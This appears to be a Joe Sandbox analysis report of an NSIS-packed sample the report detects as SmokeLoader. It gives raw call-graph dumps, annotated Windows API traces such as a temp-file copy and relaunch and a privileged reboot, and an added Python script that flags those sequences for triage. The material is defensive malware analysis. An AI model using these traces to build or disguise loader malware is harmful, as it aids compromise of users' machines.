405ac5 GetLastError 3592->3594 3593->3575 3594->3593 3596 405ae3 GetLastError 3595->3596 3597 405adf 3595->3597 3596->3597 3597->3570 4008 401c48 4009 402d89 21 API calls 4008->4009 4010 401c4f 4009->4010 4011 402d89 21 API calls 4010->4011 4012 401c5c 4011->4012 4013 402dab 21 API calls 4012->4013 4016 401c71 4012->4016 4013->4016 4014 401cd8 4019 402dab 21 API calls 4014->4019 4015 401c8c 4018 402d89 21 API calls 4015->4018 4017 402dab 21 API calls 4016->4017 4020 401c81 4016->4020 4017->4020 4021 401c91 4018->4021 4022 401cdd 4019->4022 4020->4014 4020->4015 4023 402d89 21 API calls 4021->4023 4024 402dab 21 API calls 4022->4024 4025 401c9d 4023->4025 4026 401ce6 FindWindowExW 4024->4026 4027 401cc8 SendMessageW 4025->4027 4028 401caa SendMessageTimeoutW 4025->4028 4029 401d08 4026->4029 4027->4029 4028->4029 4037 4028c9 4038 4028cf 4037->4038 4039 4028d7 FindClose 4038->4039 4040 402c2f 4038->4040 4039->4040 4041 40494a 4042 404980 4041->4042 4043 40495a 4041->4043 4045 404507 8 API calls 4042->4045 4044 4044a0 22 API calls 4043->4044 4046 404967 SetDlgItemTextW 4044->4046 4047 40498c 4045->4047 4046->4042 4051 4016d1 4052 402dab 21 API calls 4051->4052 4053 4016d7 GetFullPathNameW 4052->4053 4054 4016f1 4053->4054 4060 401713 4053->4060 4057 40687e 2 API calls 4054->4057 4054->4060 4055 401728 GetShortPathNameW 4056 402c2f 4055->4056 4058 401703 4057->4058 4058->4060 4061 406521 lstrcpynW 4058->4061 4060->4055 4060->4056 4061->4060 4062 401e53 GetDC 4063 402d89 21 API calls 4062->4063 4064 401e65 GetDeviceCaps MulDiv ReleaseDC 4063->4064 4065 402d89 21 API calls 4064->4065 4066 401e96 4065->4066 4067 40655e 21 API calls 4066->4067 4068 401ed3 CreateFontIndirectW 4067->4068 4069 40263d 4068->4069 4070 402955 4071 402dab 21 API calls 4070->4071 4072 402961 4071->4072 4073 402977 4072->4073 4074 402dab 21 API calls 4072->4074 4075 405fec 2 API calls 4073->4075 4074->4073 4076 40297d 4075->4076 4098 406011 GetFileAttributesW CreateFileW 4076->4098 4078 40298a 4079 
402a40 4078->4079 4080 4029a5 GlobalAlloc 4078->4080 4081 402a28 4078->4081 4082 402a47 DeleteFileW 4079->4082 4083 402a5a 4079->4083 4080->4081 4084 4029be 4080->4084 4085 4032b9 39 API calls 4081->4085 4082->4083 4099 4034b4 SetFilePointer 4084->4099 4087 402a35 CloseHandle 4085->4087 4087->4079 4088 4029c4 4089 40349e ReadFile 4088->4089 4090 4029cd GlobalAlloc 4089->4090 4091 402a11 4090->4091 4092 4029dd 4090->4092 4093 4060c3 WriteFile 4091->4093 4094 4032b9 39 API calls 4092->4094 4095 402a1d GlobalFree 4093->4095 4097 4029ea 4094->4097 4095->4081 4096 402a08 GlobalFree 4096->4091 4097->4096 4098->4078 4099->4088 4100 4045d6 lstrcpynW lstrlenW 4101 4014d7 4102 402d89 21 API calls 4101->4102 4103 4014dd Sleep 4102->4103 4105 402c2f 4103->4105 4106 40195b 4107 402dab 21 API calls 4106->4107 4108 401962 lstrlenW 4107->4108 4109 40263d 4108->4109 4110 4020dd 4111 4020ef 4110->4111 4121 4021a1 4110->4121 4112 402dab 21 API calls 4111->4112 4113 4020f6 4112->4113 4115 402dab 21 API calls 4113->4115 4114 401423 28 API calls 4116 4022fb 4114->4116 4117 4020ff 4115->4117 4118 402115 LoadLibraryExW 4117->4118 4119 402107 GetModuleHandleW 4117->4119 4120 402126 4118->4120 4118->4121 4119->4118 4119->4120 4130 406984 4120->4130 4121->4114 4124 402170 4126 4055a6 28 API calls 4124->4126 4125 402137 4127 401423 28 API calls 4125->4127 4128 402147 4125->4128 4126->4128 4127->4128 4128->4116 4129 402193 FreeLibrary 4128->4129 4129->4116 4135 406543 WideCharToMultiByte 4130->4135 4132 4069a1 4133 4069a8 GetProcAddress 4132->4133 4134 402131 4132->4134 4133->4134 4134->4124 4134->4125 4135->4132 4136 402b5e 4137 402bb0 4136->4137 4138 402b65 4136->4138 4139 406915 5 API calls 4137->4139 4140 402bae 4138->4140 4142 402d89 21 API calls 4138->4142 4141 402bb7 4139->4141 4143 402dab 21 API calls 4141->4143 4144 402b73 4142->4144 4145 402bc0 4143->4145 4146 402d89 21 API calls 4144->4146 4145->4140 4147 402bc4 IIDFromString 4145->4147 4149 402b7f 4146->4149 4147->4140 4148 402bd3 
[Execution graph (Joe Sandbox control-flow graph) rendered as a text dump: node identifiers are function addresses in file.exe, edges are written as "a->b", and nodes are annotated with the Windows API calls they make. APIs visible in this fragment include process and privilege handling (CreateProcessW, ShellExecuteExW, WaitForSingleObject, GetExitCodeProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess), file and directory operations (FindFirstFileW, FindNextFileW, CreateFileW, ReadFile, WriteFile, SetFilePointer, CopyFileW, MoveFileW, MoveFileExW, DeleteFileW, RemoveDirectoryW, SetFileAttributesW, SetFileTime, GetTempPathW, GetTempFileNameW, SHFileOperationW), registry access (RegOpenKeyExW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey), dynamic loading (GetModuleHandleA, GetProcAddress, LoadLibraryExW, FreeLibrary), clipboard access (OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard), environment and profile handling (SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetPrivateProfileStringW, WritePrivateProfileStringW, SearchPathW), and extensive installer-style GUI and string calls (CreateWindowExW, DialogBoxParamW, CreateDialogParamW, SendMessageW, GetDlgItem, SetDlgItemTextW, SHBrowseForFolderW, LoadImageW, lstrcpynW, lstrcatW, lstrlenW, wsprintfW, MultiByteToWideChar, WideCharToMultiByte). The raw node and edge listing is not reproduced.]
40263d 4801->4802 4803 406c3f 4805 406ac3 4803->4805 4804 40742e 4805->4804 4806 406b44 GlobalFree 4805->4806 4807 406b4d GlobalAlloc 4805->4807 4808 406bc4 GlobalAlloc 4805->4808 4809 406bbb GlobalFree 4805->4809 4806->4807 4807->4804 4807->4805 4808->4804 4808->4805 4809->4808

Control-flow Graph
[Graph for the function at 4034fc; the rendered graph is not recoverable from the page text. The edge list shows the path: SetErrorMode and GetVersionExW, then #17 (COMCTL32) / OleInitialize / SHGetFileInfoW / GetCommandLineW, command-line scanning with CharNextW, temp-directory setup (GetTempPathW, GetWindowsDirectoryW, lstrcatW, SetEnvironmentVariableW twice), DeleteFileW, then GetFileAttributesW / DeleteFileW on the .tmp path, SetCurrentDirectoryW, CopyFileW and the CreateProcessW subcall at 405b04, ending either in ExitProcess / OleUninitialize or, on the reboot branch, GetCurrentProcess / OpenProcessToken / LookupPrivilegeValueW / AdjustTokenPrivileges / ExitWindowsEx before ExitProcess.]
APIs
The strings this function references (NSIS Error, Error launching installer, ~nsu%X.tmp; see String ID below) identify it as the entry routine of the NSIS installer stub. It points TEMP and TMP at its own temp directory, copies a file (the source pointer 00437800 is not resolved in the trace) to C:\Users\user\AppData\Local\Temp\nsxA3A4.tmp, launches that copy with CreateProcessW, and on the reboot branch enables SeShutdownPrivilege before ExitWindowsEx. All of this is stock NSIS stub behaviour that any NSIS-built executable shows; on its own it is not an indicator of the SmokeLoader payload the report detects.
• SetErrorMode.KERNELBASE ref: 0040351F
• GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040354A
• GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040355D
• lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 004035F6
• #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403633 (import by ordinal; COMCTL32 ordinal 17 is InitCommonControls)
• OleInitialize.OLE32(00000000), ref: 0040363A
• SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403659
• GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040366E
• CharNextW.USER32(00000000,00434000,00000020,00434000,00000000,?,00000008,0000000A,0000000C), ref: 004036A7
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037DF
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037F0
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004037FC
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403818
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403829
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403831
• DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403845
• lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00434000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040391E
  • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
• wsprintfW.USER32 ref: 0040397B
• GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsxA3A4.tmp,C:\Users\user\AppData\Local\Temp\), ref: 004039AE
• DeleteFileW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsxA3A4.tmp), ref: 004039BA
• SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004039E8
  • Part of subcall function 004062E1: MoveFileExW.KERNEL32(?,?,00000005,00405DDF,?,00000000,000000F1,?,?,?,?,?), ref: 004062EB (dwFlags 5 = MOVEFILE_REPLACE_EXISTING | MOVEFILE_DELAY_UNTIL_REBOOT, the pending-rename path used for files in use)
• CopyFileW.KERNEL32(00437800,C:\Users\user\AppData\Local\Temp\nsxA3A4.tmp,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004039FE
  • Part of subcall function 00405B04: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,C:\Users\user\AppData\Local\Temp\nsxA3A4.tmp,?), ref: 00405B2D (dwCreationFlags 0x04000000 = CREATE_DEFAULT_ERROR_MODE)
  • Part of subcall function 00405B04: CloseHandle.KERNEL32(?,?,?,C:\Users\user\AppData\Local\Temp\nsxA3A4.tmp,?), ref: 00405B3A
  • Part of subcall function 0040687E: FindFirstFileW.KERNELBASE(74DF3420,00425F58,00425710,00405F41,00425710,00425710,00000000,00425710,00425710,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
  • Part of subcall function 0040687E: FindClose.KERNEL32(00000000), ref: 00406895
• ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A47
• OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A4C
• ExitProcess.KERNEL32 ref: 00403A69
• CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,C:\Users\user\AppData\Local\Temp\nsxA3A4.tmp,00000000), ref: 00403A70
• GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A8C
• OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403A93
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403ACB
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0 (uFlags 2 = EWX_REBOOT; reason 0x80040002 = SHTDN_REASON_FLAG_PLANNED | SHTDN_REASON_MAJOR_APPLICATION | SHTDN_REASON_MINOR_INSTALLATION)
• ExitProcess.KERNEL32 ref: 00403B13
  • Part of subcall function 00405ACF: CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
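The API list above is the kind of trace an analyst would want to triage automatically: a CopyFileW into a temp directory followed by a CreateProcessW on the copied file, TEMP/TMP being repointed, and the SeShutdownPrivilege / ExitWindowsEx reboot sequence. The following is an added example, not part of the Joe Sandbox report or of the sample: a small parser for lines in the report's "api.MODULE(args), ref: addr" format plus three detections run over them. The sample trace is constructed from the lines above (the paths, addresses and the nsxA3A4.tmp name are copied from this report); the function names and the temp-directory heuristic are this example's own choices.

```python
"""Added example (not from the Joe Sandbox report or the sample): simple detection
logic over an API trace written in the format of the report's 'APIs' list.
SAMPLE_TRACE is constructed from that list; paths, addresses and the nsxA3A4.tmp
name are as they appear in the report."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# One trace line: "<api>.<module>(<args>), ref: <addr>"; the argument list is optional.
CALL_RE = re.compile(
    r"(?P<api>[#\w]+)\.(?P<mod>[A-Za-z0-9]+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall: bool  # True for "Part of subcall function" lines (made by a callee, not this function)


def parse_trace(text: str) -> List[Call]:
    """Parse report-style call lines; lines that do not match the format are ignored."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.search(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref"),
                          "Part of subcall" in line))
    return calls


def _is_temp_path(path: str) -> bool:
    # Heuristic chosen for this example: per-user temp or the system temp directory.
    p = path.lower()
    return "\\appdata\\local\\temp\\" in p or p.startswith("c:\\windows\\temp\\")


def find_temp_relaunch(calls: List[Call]) -> Optional[Tuple[str, str]]:
    """CopyFileW into a temp directory followed by a CreateProcessW that references the copy.
    Returns (copied path, ref of the CreateProcessW call) or None."""
    for i, c in enumerate(calls):
        if c.api == "CopyFileW" and len(c.args) >= 2 and _is_temp_path(c.args[1]):
            target = c.args[1]
            for later in calls[i + 1:]:
                if later.api == "CreateProcessW" and target in later.args:
                    return target, later.ref
    return None


# ExitWindowsEx uFlags bits; a value with none of these set is EWX_LOGOFF (0).
EWX_FLAGS = {0x1: "EWX_SHUTDOWN", 0x2: "EWX_REBOOT", 0x4: "EWX_FORCE",
             0x8: "EWX_POWEROFF", 0x10: "EWX_FORCEIFHUNG"}
SHTDN_REASON_FLAG_PLANNED = 0x80000000


def find_reboot_path(calls: List[Call]) -> Optional[Dict[str, object]]:
    """LookupPrivilegeValueW(SeShutdownPrivilege) -> AdjustTokenPrivileges -> ExitWindowsEx, in order.
    Returns the decoded ExitWindowsEx flags and whether the reason code carries the PLANNED bit."""
    saw_lookup = saw_adjust = False
    for c in calls:
        if c.api == "LookupPrivilegeValueW" and "SeShutdownPrivilege" in c.args:
            saw_lookup = True
        elif c.api == "AdjustTokenPrivileges" and saw_lookup:
            saw_adjust = True
        elif c.api == "ExitWindowsEx" and saw_adjust and len(c.args) >= 2:
            flags = int(c.args[0], 16)
            reason = int(c.args[1], 16)
            names = [n for bit, n in EWX_FLAGS.items() if flags & bit] or ["EWX_LOGOFF"]
            return {"flags": names, "planned": bool(reason & SHTDN_REASON_FLAG_PLANNED)}
    return None


def find_temp_env_override(calls: List[Call]) -> Dict[str, str]:
    """SetEnvironmentVariableW on TEMP/TMP: child processes inherit the overridden directory."""
    return {c.args[0]: c.args[1] for c in calls
            if c.api == "SetEnvironmentVariableW" and len(c.args) >= 2
            and c.args[0] in ("TEMP", "TMP")}


# Constructed input: lines taken from the report's API list for the function at 4034fc.
SAMPLE_TRACE = r"""
SetErrorMode.KERNELBASE ref: 0040351F
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001), ref: 004037DF
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403829
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008), ref: 00403831
CopyFileW.KERNEL32(00437800,C:\Users\user\AppData\Local\Temp\nsxA3A4.tmp,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004039FE
Part of subcall function 00405B04: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,C:\Users\user\AppData\Local\Temp\nsxA3A4.tmp,?), ref: 00405B2D
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403ACB
ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
"""

if __name__ == "__main__":
    trace = parse_trace(SAMPLE_TRACE)
    print("temp relaunch:", find_temp_relaunch(trace))
    print("reboot path:", find_reboot_path(trace))
    print("TEMP/TMP override:", find_temp_env_override(trace))
```

The relaunch check deliberately requires the CreateProcessW to come after the CopyFileW and to reference the exact copied path, which avoids flagging an installer that merely extracts helper files to %TEMP%; the reboot check requires the privilege to be looked up and adjusted before ExitWindowsEx, since ExitWindowsEx alone fails without SeShutdownPrivilege. Both match stock NSIS stub behaviour, so they are triage signals to be read together with the report's other findings, not verdicts on their own.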
Strings
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: File$Process$Exit$CloseDirectory$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
• String ID: 1033$47305662$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsxA3A4.tmp$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
• API String ID: 2017177436-2961917500
• Opcode ID: 6f167a7f0a94b31442c0d7b54e5ff144a867fa91205ea93a415c56c3114bea8b
• Instruction ID: bee44f309595f2ff458e9cecae568de25c9667724a66d0f49069eb89ae1a0629
• Opcode Fuzzy Hash: 6f167a7f0a94b31442c0d7b54e5ff144a867fa91205ea93a415c56c3114bea8b
• Instruction Fuzzy Hash: FDF10170204301ABD720AF659D05B2B3EE8EB8570AF11483EF581B62D1DB7DCA45CB6E
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
[Graph for the function at 4056e5; the rendered graph is not recoverable from the page text. The edge list shows: three GetDlgItem lookups, GetClientRect, GetSystemMetrics and a series of SendMessageW calls that configure the details list view and progress bar; a branch that calls GetDlgItem then CreateThread and FindCloseChangeNotification; ShowWindow branches; a context-menu branch (CreatePopupMenu, AppendMenuW, GetWindowRect, TrackPopupMenu); and a copy-to-clipboard branch (OpenClipboard, EmptyClipboard, GlobalAlloc, GlobalLock, a SendMessageW loop, GlobalUnlock, SetClipboardData, CloseClipboard).]
APIs
This routine is the installer's details-page dialog procedure: the window messages below are list-view (LVM_*) and progress-bar (PBM_*) control messages, decoded in parentheses for reference.
• GetDlgItem.USER32(?,00000403), ref: 00405743 (control ID 1027)
• GetDlgItem.USER32(?,000003EE), ref: 00405752 (control ID 1006)
• GetClientRect.USER32(?,?), ref: 0040578F
• GetSystemMetrics.USER32(00000002), ref: 00405796 (SM_CXVSCROLL)
• SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B7 (LVM_INSERTCOLUMNW, column 0)
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C8 (LVM_SETEXTENDEDLISTVIEWSTYLE, mask and style 0x4000 = LVS_EX_LABELTIP)
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057DB (LVM_SETBKCOLOR)
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E9 (LVM_SETTEXTBKCOLOR)
• SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FC (LVM_SETTEXTCOLOR)
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581E
• ShowWindow.USER32(?,00000008), ref: 00405832 (SW_SHOWNA)
• GetDlgItem.USER32(?,000003EC), ref: 00405853 (control ID 1004)
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405863 (PBM_SETRANGE, lParam 0x75300000 = range 0..30000)
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587C (PBM_SETBARCOLOR)
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405888 (CCM_SETBKCOLOR / PBM_SETBKCOLOR)
• GetDlgItem.USER32(?,000003F8), ref: 00405761 (control ID 1016)
  • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,00000001,00404300), ref: 004044E3
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004058A5
                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005679,00000000), ref: 004058B3
                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004058BA
                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004058DE
                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 004058E3
                                                                                                                                                                                          • ShowWindow.USER32(00000008), ref: 0040592D
                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405961
                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 00405972
                                                                                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405986
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004059A6
                                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BF
                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F7
                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405A07
                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00405A0D
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A19
                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405A23
                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A37
                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405A57
                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405A62
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 00405A68
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                                                                                                                                          • String ID: {$fh
                                                                                                                                                                                          • API String ID: 4154960007-3185793605
                                                                                                                                                                                          • Opcode ID: b00847ff47827a43b93895459648fd8745bc42cf01a25ae6d3cf6e6dbf784441
                                                                                                                                                                                          • Instruction ID: bfdbfabbc3eccdd340dcac883e36f8678c6b127a6a9b52dc92d7db9eae4071ee
                                                                                                                                                                                          • Opcode Fuzzy Hash: b00847ff47827a43b93895459648fd8745bc42cf01a25ae6d3cf6e6dbf784441
                                                                                                                                                                                          • Instruction Fuzzy Hash: FBB127B1900618FFDB11AF60DD89AAE7B79FB44354F00813AFA41B61A0CB754A92DF58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
• Instruction ID: 98dfc50ccd9688b87079ede1b44bfc78bfb7a95d74622a08e623e0ee65e5f8c5
• Opcode Fuzzy Hash: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
• Instruction Fuzzy Hash: B2F17870D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
APIs
• FindFirstFileW.KERNELBASE(74DF3420,00425F58,00425710,00405F41,00425710,00425710,00000000,00425710,00425710,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
• FindClose.KERNEL32(00000000), ref: 00406895
Strings
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
